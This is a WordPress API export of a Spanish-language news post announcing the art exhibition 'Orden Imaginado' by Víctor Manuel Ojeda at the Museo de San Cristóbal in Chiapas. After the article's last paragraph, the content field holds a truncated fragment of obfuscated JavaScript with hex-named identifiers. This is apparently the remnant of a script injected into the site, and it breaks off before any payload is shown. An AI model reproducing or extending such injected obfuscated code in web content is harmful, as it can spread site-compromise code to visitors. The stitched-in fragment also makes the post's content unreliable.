{"id":15169,"date":"2024-04-17T02:48:41","date_gmt":"2024-04-17T02:48:41","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15169"},"modified":"2024-04-17T02:48:42","modified_gmt":"2024-04-17T02:48:42","slug":"presentaran-exposicion-orden-imaginado-en-el-museo-de-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15169","title":{"rendered":"Presentar\u00e1n exposici\u00f3n &#8220;Orden Imaginado&#8221; en el Museo de San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"376\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240416-WA0027.jpg\" alt=\"\" class=\"wp-image-15170\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240416-WA0027.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240416-WA0027-300x157.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>16 de abril del 2024. San Crist\u00f3bal de Las Casas.- El artista visual V\u00edctor Manuel Ojeda estar\u00e1 presentando su esperada exposici\u00f3n colectiva &#8220;Orden Imaginado&#8221; el pr\u00f3ximo 26 de abril a las 18 horas en el Museo de San Crist\u00f3bal (Musac).<\/p>\n\n\n\n<p>Graduado de la prestigiosa Academia de Artes Pl\u00e1sticas Eduardo Abela y la Universidad de las Artes (ISA) en Cuba, Ojeda es reconocido por su habilidad para plasmar el paisaje como una reflexi\u00f3n personal sobre el espacio, el tiempo y la espiritualidad.<\/p>\n\n\n\n<p>La muestra, organizada en colaboraci\u00f3n con Portales del Arte y el National Museum Mexican Of Art, invit\u00f3 a los espectadores a sumergirse en el mundo pict\u00f3rico del artista, donde las indagaciones conceptuales se entrelazan con una dramaturgia del paisaje.<\/p>\n\n\n\n<p>&#8220;Esta exposici\u00f3n promete ser una experiencia \u00fanica para todos los amantes del arte, que podr\u00e1n disfrutar de la visi\u00f3n \u00fanica de V\u00edctor Manuel Ojeda en el Musac a partir del 26 de abril&#8221;, se\u00f1alan en la invitaci\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 16 de abril del 2024. San Crist\u00f3bal de Las Casas.- El artista visual V\u00edctor Manuel Ojeda estar\u00e1 presentando su esperada exposici\u00f3n colectiva &#8220;Orden Imaginado&#8221; el pr\u00f3ximo 26 de abril a las 18 horas en el Museo de San Crist\u00f3bal (Musac). Graduado de la prestigiosa Academia de Artes Pl\u00e1sticas Eduardo Abela y la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15170,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-15169","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15169","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15169"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15169\/revisions"}],"predecessor-version":[{"id":15171,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15169\/revisions\/15171"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15170"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15169"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15169"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15169"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}